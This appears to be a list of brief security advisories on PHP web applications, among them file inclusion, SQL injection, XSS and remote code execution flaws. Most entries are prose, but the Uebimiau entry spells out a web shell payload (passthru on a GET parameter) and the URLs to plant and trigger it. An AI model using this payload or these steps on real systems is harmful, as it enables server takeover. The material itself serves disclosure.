The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'u' parameter to 'index.php', 'full.php' and 'contact.php' scripts. This can be exploited to include arbitrary files from local resources via directory traversal attacks.
DB Top Sites v1.0 is vulnerable to a Remote Command Execution vulnerability. An attacker can inject malicious code into the 'location' field when registering as a user. This code will be saved in a file named 'username.php' in the 'sites' directory. The attacker can then access the file and execute arbitrary commands on the server.
Multiple Vulnerabilities exist in FormMail software. What follows is the code used to validate the user input: Line 283: $safeConfig array definition. Line 518: definition of clean_html. The clean_html function is used to sanitize the user input, but it is not enough to prevent Cross Site Scripting and HTTP Response Header Injection.
A Remote Code Execution Vulnerability exists in SugarCRM software. The vulnerability resides in the "Compose Email" section. The software permits sending email with attachments (if not disabled by the administrator). When the name of the file is specified, a validation routine is called. The "upload_badext" array contains a list of file extensions that are not allowed to be uploaded. The problem is that the validation routine does not check the content of the file, only the extension. The attacker can upload a file with a malicious extension (for example ".php") and then rename it to a valid extension (for example ".txt"). The file will be uploaded and the attacker can execute it by accessing the URL.
Mundi Mail is prone to a local/remote file-inclusion vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include arbitrary local or remote files, allowing for the execution of arbitrary PHP code. This issue affects the 'template/simpledefault/admin/_masterlayout.php' script. The attacker must have access to register_globals and allow_url_fopen must be enabled for remote file inclusion. If magic_quotes_gpc is disabled, local file inclusion is possible.
Impleo Music Collection 2.0 is vulnerable to SQL Injection (Auth Bypass) and Cross Site Scripting. The vulnerable code is present in /admin/login.php, where the user input is not properly sanitized. An attacker can exploit this vulnerability to bypass authentication and execute arbitrary SQL commands. An attacker can also inject malicious JavaScript code in the application to perform Cross Site Scripting attacks.
A vulnerability in Joomla Component Com_Projectfork allows an attacker to include local files on the server. This vulnerability is due to insufficient sanitization of user-supplied input to the 'section' parameter in the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal characters to the vulnerable script. This may allow the attacker to include arbitrary local files on the server, resulting in the disclosure of sensitive information.
Uebimiau Webmail v3.2.0-1.8 is vulnerable to a remote file/overwrite vulnerability. An attacker can exploit this vulnerability by accessing the /uebimiau/admin/editor.php?load=config page and writing malicious code such as <?php passthru($_GET[cmd]); ?> and clicking the 'Write To File' button. The attacker can then access the /uebimiau/index.php?cmd=id page to execute the malicious code.
transLucidonline is the easy website publishing system with which anyone can create and maintain web content, in multiple languages and based on a growing list of ready-made, professional layouts. Cross Site Scripting vulnerabilities were found in the NodeID and action parameters, both in the admin and public panels. HTML Injection vulnerabilities were found in the Title and Url fields when editing a page, as well as when creating a new page. Injections can also be executed when switching the theme to Developer.
Pivot is a web-based tool to help maintain dynamic sites, like weblogs or online journals. It is written in PHP and does not require additional libraries or databases to function. The vulnerability is present in the url, menu, sort, check[], edituser, edit, blog, and cat functions. Path disclosure can be triggered by sending a request to tb.php with a valid tb_id. Cross Site Scripting can be triggered when one is not logged in, and when logged in as an administrator. HTML Injection can be triggered by sending a request to index.php with a valid sort parameter. Cross Site Scripting can also be triggered using the post method.
Services By CQR